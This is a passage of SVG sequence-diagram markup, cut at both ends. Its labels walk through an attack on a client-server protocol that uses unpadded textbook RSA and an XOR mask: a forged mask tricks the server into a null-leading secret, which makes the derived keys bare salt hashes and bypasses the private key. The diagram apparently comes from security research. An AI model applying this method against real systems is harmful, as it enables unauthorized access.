fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="354.60116056901495" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, with the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="455.2678246925501" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">HARDCODED PUBLIC KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="195.81782774430795" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="396.91783384782354" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option, yields a bytestring that</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">begins with a byte between </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="396.601175827804" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="446.5845094154505" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="496.9178414772181" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7f</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="541.2178407142786" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, then we will have a</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="971.3037537589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">1 in 92 chance of tricking the Server into generating a </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="663.4011636207728" y="971.3037537589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that begins with a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="299.7178292701868" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">NULL BYTE</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="421.10116056901495" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. This will cause </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="585.3678231666712" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="687.5011544654993" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="737.8344865272669" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1014.0265931589988" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to be nothing but hashes of their respective salts.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1035.3880128589988" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result of this search as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="444.2511697242884" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="681.78451017839" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 1065.294000439 L 169.61494948743945 1065.294000439 L 169.61494948743945 1093.063846049 L 101.7568395737728 1093.063846049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(84.16927068743945,1093.063846049) translate(-84.16927068743945,-1093.063846049)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 101.97045377077279 1084.1632545073332 L 84.16927068743945 1093.063846049 L 101.97045377077279 1101.9644375906666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="290.0994368441256" y="1125.105975599" width="399.02509842586915" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="293.3036497991256" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="350.0369833867721" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.5703238408737" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 84.16927068743945 1152.875821209 L 877.4671325403475 1152.875821209" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(895.0547014266808,1152.875821209) translate(-895.0547014266808,-1152.875821209)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 877.2535183433475 1143.9752296673332 L 895.0547014266808 1152.875821209 L 877.2535183433475 1161.7764127506666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="952.3745109550141" y="1184.917950759" width="623.2084404058496" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="1206.279370459" width="437.2417541570703" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Decrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1041.228725435893" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1278.7620658899946" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1333.89540100352" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="1225.504648189" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1148.445392611186" y="1225.504648189" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266808 1234.049216069 L 1012.5425097766808 1234.049216069 L 1012.5425097766808 1261.819061679 L 944.6843998630142 1261.819061679" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(927.0968309766808,1261.819061679) translate(-927.0968309766808,-1261.819061679)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 944.8980140600141 1252.9184701373333 L 927.0968309766808 1261.819061679 L 944.8980140600141 1270.7196532206667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1293.861191229" width="425.9917694158594" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1315.222610929" width="500.7584138937036" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1336.584030629" width="435.14176331234376" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1313.086468959" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Generate a string of 31 random, printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">characters (between ASCII codes </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1302.9260902541546" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1352.909423841801" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1403.2427559035686" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7e</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1452.8094215529827" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1355.809308359" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1198.3094368117718" y="1355.809308359" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1364.353876239 L 1023.2232196266808 1364.353876239 L 1023.2232196266808 1392.123721849 L 955.3651097130141 1392.123721849" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(937.7775408266808,1392.123721849) translate(-937.7775408266808,-1392.123721849)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 955.5787239100141 1383.2231303073333 L 937.7775408266808 1392.123721849 L 955.5787239100141 1401.0243133906667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="973.735930655014" y="1424.165851399" width="579.8917594976465" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1445.527271099" width="558.4917388982813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1466.888690799" width="496.92508850765626" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1488.250110499" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1509.6115301989998" width="546.3250976629297" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1060.2068138370648" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1256.8901481876508" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1312.0234833011762" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_encrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1464.752548829" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded, 1024-bit public RSA key, with the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="976.940143610014" y="1486.113968529" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1178.0401497135297" y="1486.113968529" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option set ("Textbook RSA").</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1507.475388229" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1528.8368079289999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the 128-byte result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1263.690143610014" y="1528.8368079289999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 937.7775408266808 1537.381375809 L 1033.9039294766808 1537.381375809 L 1033.9039294766808 1565.151221419 L 966.0458195630141 1565.151221419" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(948.4582506766808,1565.151221419) translate(-948.4582506766808,-1565.151221419)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 966.2594337600141 1556.2506298773333 L 948.4582506766808 1565.151221419 L 966.2594337600141 1574.0518129606667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="259.2775241008883" y="1597.193350969" width="503.39176331234376" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="262.4817370558883" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send 128-byte </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="415.6150683547164" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="668.7817401076461" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Client</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1624.963196579 L 112.4375494237728 1624.963196579" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(94.84998053743945,1624.963196579) translate(-94.84998053743945,-1624.963196579)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 112.65116362077279 1616.0626050373332 L 94.84998053743945 1624.963196579 L 112.65116362077279 1633.8637881206666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="973.735930655014" y="1657.005326129" width="483.17508993816773" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1678.366745829" width="503.9584117956201" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1699.7281655289999" width="185.5917540617029" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="976.940143610014" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1024.0401420841351" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1030.3901419887677" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1227.0734763393536" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with the first 31 bytes</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1002.5568104038373" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1240.5234699497357" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store the result in</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1718.9534432589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1149.7734718570844" y="1718.9534432589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 1727.498011139 L 1033.9039294766808 1727.498011139 L 1033.9039294766808 1755.267856749 L 966.0458195630141 1755.267856749" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(948.4582506766808,1755.267856749) translate(-948.4582506766808,-1755.267856749)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 966.2594337600141 1746.3672652073333 L 948.4582506766808 1755.267856749 L 966.2594337600141 1764.1684482906667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1787.309986299" width="450.4417511053125" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1808.671405999" width="475.2084289617578" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1830.0328256989999" width="375.8917571134607" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1851.3942453989998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1872.7556650989998" width="457.04175720882813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1894.1170847989997" width="157.77508841228882" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1806.535264029" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">We no longer need to be able to decrypt the</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1827.896683729" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="387.1792550737025" y="1827.896683729" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and so we no longer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">have any need of the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="353.6792550737025" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="497.14591461960094" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1870.6195231289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">We can simply set </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.34591156784313" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="519.0292459184291" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="134.0125833207728" y="1913.3423625289997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">empty string</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="279.02924591842907" y="1913.3423625289997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 94.84998053743945 1921.8869304090001 L 190.97636918743945 1921.8869304090001 L 190.97636918743945 1949.656776019 L 123.1182592737728 1949.656776019" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(105.53069038743945,1949.656776019) translate(-105.53069038743945,-1949.656776019)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 123.33187347077279 1940.7561844773334 L 105.53069038743945 1949.656776019 L 123.33187347077279 1958.5573675606668 Z"/></g></g><g><g><rect fill="white" stroke="none" x="984.416640505014" y="1981.6989055690003" width="340.0250946111719" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2003.0603252690003" width="627.508409125332" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2024.4217449690002" width="586.8917456693689" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2045.7831646690001" width="137.67508850765626" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2067.1445843690003" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2088.5060040690005" width="589.0584198064844" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2109.8674237690007" width="620.708417517666" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2131.228843469001" width="509.0584150381128" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2000.9241832990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Create two new strings by calling</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1072.1875191094282" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1229.7708473564985" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1251.6708469750288" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1283.604179418266" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1354.5208435418012" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1376.4208431603315" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1549.2541714074018" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1558.3875046135786" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1072.1875191094282" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1231.4541817070844" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1253.3541813256147" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1285.287513768852" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1357.8875122429731" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1379.7875118615034" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1552.6208401085737" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1561.7541733147505" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2065.008442399" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively. </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2086.3698620990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Note that if </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" 